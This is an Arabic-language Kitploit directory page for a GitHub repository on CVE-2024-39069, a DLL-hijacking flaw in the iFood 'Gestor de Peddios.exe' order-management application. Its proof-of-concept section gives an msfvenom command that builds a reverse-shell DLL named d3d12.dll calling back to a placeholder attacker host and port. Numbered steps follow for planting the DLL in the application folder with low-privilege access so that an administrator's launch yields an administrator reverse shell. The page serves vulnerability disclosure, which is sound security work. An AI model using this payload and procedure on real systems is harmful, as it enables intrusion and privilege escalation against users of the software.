Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-39069 — CVE-2024-39069 | Kitploit
أدوات/GitHubGitHub/aungsoepaing/cve-2024-39069
تصعيد الامتيازاتتوليد الحمولةالاستغلالشيل كوداختبار الاختراقاستغلال الملفات الثنائية
GitHubaungsoepaing/cve-2024-39069

CVE-2024-39069

CVE-2024-39069

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مدير طلبات ifood 'Gestor de Peddios.exe' - اختطاف DLL

يضع المهاجم ملف DLL ضار باسم "d3d12.dll" في دليل يتم البحث فيه بواسطة التطبيق قبل العثور على الملف "d3d12.dll" الشرعي. عند تشغيل التطبيق، يتم تحميل ملف DLL الضار بدلاً من الشرعي، مما يسمح للمهاجم بتنفيذ تعليمات برمجية عشوائية في سياق التطبيق.

الصفحة الرئيسية للبائع: https://gestordepedidos.ifood.com.br/

جوجل درايف: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing

فيديو الإثبات: https://youtu.be/oMIobV2M0T8

الإثبات

  1. إنشاء ملف dll ضار على كالي لينكس باستخدام msfvenom

    root@kitploit:~
    msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
    
  2. نقل الملف 'd3d12.dll' الذي تم إنشاؤه إلى مضيف ويندوز من كالي مع وصول مستخدم منخفض المستوى

  3. نقل ملف 'd3d12.dll' الذي تم إنشاؤه إلى المسار 'C:\Gestor de Peddios\d3d12.dll' مع وصول مستخدم منخفض المستوى

  4. عند تشغيل المسؤول للتطبيق، ستحصل على وصول عكسي كمسؤول

تنزيل الأداة